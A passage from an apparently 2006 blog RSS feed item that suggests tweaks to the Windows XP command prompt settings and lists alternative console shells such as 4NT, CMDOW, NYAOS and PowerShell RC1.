Options &#124; Edit Options &#124; QuickEdit Mode &#124; True
Layout &#124; Screen buffer size &#124; [...]]]></description>
			<content:encoded><![CDATA[<p>If you are looking for some command prompt alternative. Eventhough I think that the one embedded to XP is still good enough after some tweaks:</p>
<ul>
<li>Options | Command History | Buffer Size | 500</li>
<li>Options | Command History | Discard Old Duplicates | True</li>
<li>Options | Edit Options | QuickEdit Mode | True</li>
<li>Layout | Screen buffer size | Height | 999</li>
<li>Layout | Window size | Height | 50</li>
</ul>
<p>You can use one of the following:</p>
<p><a href="http://www.jpsoft.com/4ntdes.htm">4NT by JPSoft</a>  is pretty interesting but still a bit expensive $70</p>
<p>http://msmvps.com/blogs/coad/archive/2005/02/19/36473.aspx</p>
<p><a href="http://www.commandline.co.uk/cmdow/">CMDNow</a> seems pretty intersting (I am testing this one), it allow you to do &#8220;stuff&#8221; on opened windows.</p>
<p>http://www.commandline.co.uk/cmdow/</p>
<p><a href="http://www.nyaos.org/index.html">NYAOS</a> seems also a good try</p>
<p>http://www.nyaos.org/index.html</p>
<p>You may also want to try Nomad aka <a onclick="trackInfo(this)" href="http://www.microsoft.com/technet/scriptcenter/hubs/msh.mspx">Windows PowerShell RC1</a> by Microsoft the new script shell for windows systems</p>
]]></content:encoded>
			<wfw:commentRss>http://florian.puthod.net/blog/2006/console-power/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
